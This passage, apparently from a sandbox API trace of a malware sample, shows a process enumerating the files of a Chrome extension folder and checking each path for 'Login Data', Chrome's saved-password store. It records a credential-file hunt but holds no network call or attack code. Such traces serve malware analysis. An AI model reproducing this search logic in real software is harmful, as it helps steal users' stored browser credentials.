0x1c [0161.516] GetProcessHeap () returned 0x8e0000 [0161.516] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x917dc8 | out: hHeap=0x8e0000) returned 1 [0161.516] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html", lpSrch="Login Data") returned 0x0 [0161.516] VirtualQuery (in: lpAddress=0x925a88, lpBuffer=0x2debac, dwLength=0x1c | out: lpBuffer=0x2debac*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.516] GetProcessHeap () returned 0x8e0000 [0161.516] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925a88 | out: hHeap=0x8e0000) returned 1 [0161.516] FindNextFileW (in: hFindFile=0x8f9b80, lpFindFileData=0x2debf0 | out: lpFindFileData=0x2debf0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b998f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b9b830, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xe4180700, ftLastWriteTime.dwHighDateTime=0x1d03f5e, nFileSizeHigh=0x0, nFileSizeLow=0x5f, dwReserved0=0x0, dwReserved1=0x0, cFileName="main.js", cAlternateFileName="")) returned 1 [0161.516] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0") returned 125 [0161.516] lstrlenW (lpString="\\") returned 1 [0161.516] GetProcessHeap () returned 0x8e0000 [0161.516] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xfe) returned 0x917dc8 [0161.516] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0" [0161.516] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\" [0161.516] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\") returned 126 [0161.516] lstrlenW (lpString="main.js") returned 7 [0161.517] GetProcessHeap () returned 0x8e0000 [0161.517] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x10c) returned 0x925a88 [0161.517] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\" [0161.517] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\", lpString2="main.js" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js" [0161.517] VirtualQuery (in: lpAddress=0x917dc8, lpBuffer=0x2deba0, dwLength=0x1c | out: lpBuffer=0x2deba0*(BaseAddress=0x917000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.517] GetProcessHeap () returned 0x8e0000 [0161.517] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x917dc8 | out: hHeap=0x8e0000) returned 1 [0161.517] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js", lpSrch="Login Data") returned 0x0 [0161.517] VirtualQuery (in: lpAddress=0x925a88, lpBuffer=0x2debac, dwLength=0x1c | out: lpBuffer=0x2debac*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.517] GetProcessHeap () returned 0x8e0000 [0161.517] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925a88 | out: hHeap=0x8e0000) returned 1 [0161.517] FindNextFileW (in: hFindFile=0x8f9b80, lpFindFileData=0x2debf0 | out: lpFindFileData=0x2debf0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b9b830, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x2d5, dwReserved0=0x0, dwReserved1=0x0, cFileName="manifest.json", cAlternateFileName="MANIFE~1.JSO")) returned 1 [0161.517] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0") returned 125 [0161.517] lstrlenW (lpString="\\") returned 1 [0161.517] GetProcessHeap () returned 0x8e0000 [0161.517] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xfe) returned 0x917dc8 [0161.517] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0" [0161.517] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\" [0161.517] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\") returned 126 [0161.517] lstrlenW (lpString="manifest.json") returned 13 [0161.517] GetProcessHeap () returned 0x8e0000 [0161.517] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x118) returned 0x925a88 [0161.517] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\" [0161.517] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\", lpString2="manifest.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json" [0161.517] VirtualQuery (in: lpAddress=0x917dc8, lpBuffer=0x2deba0, dwLength=0x1c | out: lpBuffer=0x2deba0*(BaseAddress=0x917000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.517] GetProcessHeap () returned 0x8e0000 [0161.517] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x917dc8 | out: hHeap=0x8e0000) returned 1 [0161.517] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json", lpSrch="Login Data") returned 0x0 [0161.517] VirtualQuery (in: lpAddress=0x925a88, lpBuffer=0x2debac, dwLength=0x1c | out: lpBuffer=0x2debac*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.517] GetProcessHeap () returned 0x8e0000 [0161.517] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925a88 | out: hHeap=0x8e0000) returned 1 [0161.517] FindNextFileW (in: hFindFile=0x8f9b80, lpFindFileData=0x2debf0 | out: lpFindFileData=0x2debf0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b4d630, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b4d630, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_locales", cAlternateFileName="")) returned 1 [0161.517] lstrcmpiW (lpString1="_locales", lpString2=".") returned 1 [0161.517] lstrcmpiW (lpString1="_locales", lpString2="..") returned 1 [0161.517] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0") returned 125 [0161.518] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0") returned 125 [0161.518] lstrlenW (lpString="\\") returned 1 [0161.518] GetProcessHeap () returned 0x8e0000 [0161.518] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xfe) returned 0x917dc8 [0161.518] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0" [0161.518] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\" [0161.518] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\") returned 126 [0161.518] lstrlenW (lpString="_locales") returned 8 [0161.518] GetProcessHeap () returned 0x8e0000 [0161.518] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x10e) returned 0x925a88 [0161.518] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\" [0161.518] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\", lpString2="_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0161.518] VirtualQuery (in: lpAddress=0x917dc8, lpBuffer=0x2deba0, dwLength=0x1c | out: lpBuffer=0x2deba0*(BaseAddress=0x917000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.518] GetProcessHeap () returned 0x8e0000 [0161.518] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x917dc8 | out: hHeap=0x8e0000) returned 1 [0161.518] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.518] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.518] lstrlenW (lpString="\\*.*") returned 4 [0161.518] GetProcessHeap () returned 0x8e0000 [0161.518] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x925ba0 [0161.518] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0161.518] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\*.*" [0161.518] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\*.*", lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b4d630, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b4d630, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9bc0 [0161.520] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.520] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b4d630, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b4d630, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0161.520] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.520] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.520] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857953d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857953d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="ar", cAlternateFileName="")) returned 1 [0161.520] lstrcmpiW (lpString1="ar", lpString2=".") returned 1 [0161.520] lstrcmpiW (lpString1="ar", lpString2="..") returned 1 [0161.520] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.520] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.520] lstrlenW (lpString="\\") returned 1 [0161.520] GetProcessHeap () returned 0x8e0000 [0161.521] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.521] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0161.521] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.521] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0161.521] lstrlenW (lpString="ar") returned 2 [0161.521] GetProcessHeap () returned 0x8e0000 [0161.521] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.521] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.521] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="ar" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar" [0161.521] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.521] GetProcessHeap () returned 0x8e0000 [0161.521] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.521] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar") returned 137 [0161.521] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar") returned 137 [0161.521] lstrlenW (lpString="\\*.*") returned 4 [0161.521] GetProcessHeap () returned 0x8e0000 [0161.521] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.521] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar" [0161.521] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\*.*" [0161.521] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857953d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857953d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.522] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.522] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857953d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857953d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0161.522] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.522] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.522] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857953d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x101, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.522] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS 